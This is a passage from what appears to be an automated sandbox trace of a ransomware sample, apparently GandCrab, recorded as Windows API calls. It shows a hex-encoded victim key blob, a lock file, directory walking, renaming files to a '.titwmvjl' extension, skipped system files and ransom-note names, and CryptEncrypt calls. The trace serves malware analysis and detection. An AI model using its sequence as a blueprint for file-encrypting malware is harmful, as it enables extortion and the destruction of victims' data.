5\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0070.384] WriteFile (in: hFile=0x2dc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e2fc, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e2fc*=0x2162, lpOverlapped=0x0) returned 1 [0070.385] CloseHandle (hObject=0x2dc) returned 1 [0070.385] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.385] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.385] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0xf, wMilliseconds=0x2bb)) [0070.385] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.386] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0070.386] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0070.386] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\d2ca4a09d2ca4deb61a.lock") returned 125 [0070.386] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2dc [0070.386] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.387] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.387] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\") returned 101 [0070.387] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*" [0070.387] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*", fInfoLevelId=0x1, lpFindFileData=0x259e318, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e318) returned 0x503378 [0070.387] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0070.387] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0070.387] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0070.387] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0070.387] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0070.387] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0070.387] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0070.388] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\d2ca4a09d2ca4deb61a.lock" [0070.388] lstrlenW (lpString=".titwmvjl") returned 9 [0070.388] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\d2ca4a09d2ca4deb61a.lock") returned 125 [0070.388] VirtualAlloc (lpAddress=0x0, dwSize=0x13a, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.388] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 134 [0070.388] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\d2ca4a09d2ca4deb61a.lock") returned 125 [0070.388] lstrlenW (lpString=".lock") returned 5 [0070.388] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.388] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0070.388] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.388] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.388] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0070.388] lstrcmpW (lpString1="settings.sol", lpString2=".") returned 1 [0070.388] lstrcmpW (lpString1="settings.sol", lpString2="..") returned 1 [0070.388] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\", lpString2="settings.sol" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol" [0070.388] lstrlenW (lpString=".titwmvjl") returned 9 [0070.388] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol") returned 113 [0070.388] VirtualAlloc (lpAddress=0x0, dwSize=0x122, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.389] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol.titwmvjl") returned 122 [0070.389] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol") returned 113 [0070.389] lstrlenW (lpString=".sol") returned 4 [0070.389] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.389] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".sol ") returned 5 [0070.389] lstrcmpiW (lpString1=".sol", lpString2=".titwmvjl") returned -1 [0070.389] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.389] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol") returned 113 [0070.389] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol") returned 113 [0070.389] lstrcmpiW (lpString1="settings.sol", lpString2="desktop.ini") returned 1 [0070.389] lstrcmpiW (lpString1="settings.sol", lpString2="autorun.inf") returned 1 [0070.389] lstrcmpiW (lpString1="settings.sol", lpString2="ntuser.dat") returned 1 [0070.389] lstrcmpiW (lpString1="settings.sol", lpString2="iconcache.db") returned 1 [0070.389] lstrcmpiW (lpString1="settings.sol", lpString2="bootsect.bak") returned 1 [0070.389] lstrcmpiW (lpString1="settings.sol", lpString2="boot.ini") returned 1 [0070.389] lstrcmpiW (lpString1="settings.sol", lpString2="ntuser.dat.log") returned 1 [0070.389] lstrcmpiW (lpString1="settings.sol", lpString2="thumbs.db") returned -1 [0070.389] lstrcmpiW (lpString1="settings.sol", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0070.389] lstrcmpiW (lpString1="settings.sol", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0070.389] lstrcmpiW (lpString1="settings.sol", lpString2="KRAB-DECRYPT.html") returned 1 [0070.389] lstrcmpiW (lpString1="settings.sol", lpString2="CRAB-DECRYPT.html") returned 1 [0070.389] lstrcmpiW (lpString1="settings.sol", lpString2="KRAB-DECRYPT.txt") returned 1 [0070.389] lstrcmpiW (lpString1="settings.sol", lpString2="CRAB-DECRYPT.txt") returned 1 [0070.389] lstrcmpiW (lpString1="settings.sol", lpString2="ntldr") returned 1 [0070.389] lstrcmpiW (lpString1="settings.sol", lpString2="NTDETECT.COM") returned 1 [0070.389] lstrcmpiW (lpString1="settings.sol", lpString2="Bootfont.bin") returned 1 [0070.389] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol") returned 113 [0070.389] lstrlenW (lpString=".sol") returned 4 [0070.390] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.390] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".sol ") returned 5 [0070.390] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.390] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.390] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2e4 [0070.390] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0070.390] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.390] CryptAcquireContextW (in: phProv=0x259e194, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e194*=0x4cdb38) returned 1 [0070.391] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0070.391] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0070.391] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0070.391] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259e220 | out: pbBuffer=0x259e220) returned 1 [0070.391] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.392] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.392] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.392] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.392] CryptAcquireContextW (in: phProv=0x259e194, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e194*=0x4cdb38) returned 1 [0070.392] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0070.392] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0070.393] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0070.393] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259e240 | out: pbBuffer=0x259e240) returned 1 [0070.393] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.393] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.393] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.393] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.393] CryptAcquireContextW (in: phProv=0x259e188, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e188*=0x4cdb38) returned 1 [0070.394] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.394] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e18c | out: phKey=0x259e18c*=0x5034f8) returned 1 [0070.394] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.394] CryptGetKeyParam (in: hKey=0x5034f8, dwParam=0x8, pbData=0x259e180, pdwDataLen=0x259e184, dwFlags=0x0 | out: pbData=0x259e180*=0x800, pdwDataLen=0x259e184*=0x4) returned 1 [0070.394] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.395] CryptEncrypt (in: hKey=0x5034f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259e1b8*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259e1b8*=0x100) returned 1 [0070.395] GetLastError () returned 0x0 [0070.395] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.395] CryptDestroyKey (hKey=0x5034f8) returned 1 [0070.395] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.395] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.395] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.395] CryptAcquireContextW (in: phProv=0x259e188, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e188*=0x4cdb38) returned 1 [0070.396] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.396] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e18c | out: phKey=0x259e18c*=0x5033f8) returned 1 [0070.396] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.396] CryptGetKeyParam (in: hKey=0x5033f8, dwParam=0x8, pbData=0x259e180, pdwDataLen=0x259e184, dwFlags=0x0 | out: pbData=0x259e180*=0x800, pdwDataLen=0x259e184*=0x4) returned 1 [0070.396] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.396] CryptEncrypt (in: hKey=0x5033f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259e1b8*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259e1b8*=0x100) returned 1 [0070.397] GetLastError () returned 0x0 [0070.397] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.397] CryptDestroyKey (hKey=0x5033f8) returned 1 [0070.397] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0070.397] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0070.397] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, 